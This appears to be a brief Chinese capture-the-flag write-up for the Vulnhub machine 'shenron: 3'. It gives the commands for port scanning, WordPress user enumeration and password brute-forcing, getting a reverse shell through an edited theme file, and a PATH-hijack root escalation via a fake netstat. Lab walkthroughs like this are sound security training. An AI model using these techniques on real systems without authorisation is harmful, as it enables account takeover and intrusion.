Vulnhub: shenron: 3靶机

kali:192.168.111.111

靶机:192.168.111.171

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.171

Vulnhub: shenron: 3靶机_第1张图片

修改hosts后访问目标80端口,发现是wordpress

Vulnhub: shenron: 3靶机_第2张图片

wpscan收集目标用户,爆破出密码:iloverockyou

wpscan --url http://shenron/ -e u
wpscan --url http://shenron/ -U admin -P /usr/share/wordlists/rockyou.txt

Vulnhub: shenron: 3靶机_第3张图片

登录后修改目标源码拿shell

Vulnhub: shenron: 3靶机_第4张图片

修改后访问http://shenron/wp-content/themes/twentyeleven/404.php获得反弹shell

Vulnhub: shenron: 3靶机_第5张图片

提权

shenron用户的密码也是iloverockyou

Vulnhub: shenron: 3靶机_第6张图片

在shenron用户家目录下发现network程序,执行后发现该程序会执行netstat命令,修改环境变量提权

echo '/bin/bash' > /tmp/netstat
chmod 777 /tmp/netstat
export PATH=/tmp:$PATH
./network

Vulnhub: shenron: 3靶机_第7张图片

Vulnhub: shenron: 3靶机_第8张图片

flag

Vulnhub: shenron: 3靶机_第9张图片

你可能感兴趣的:(web安全,网络安全,安全)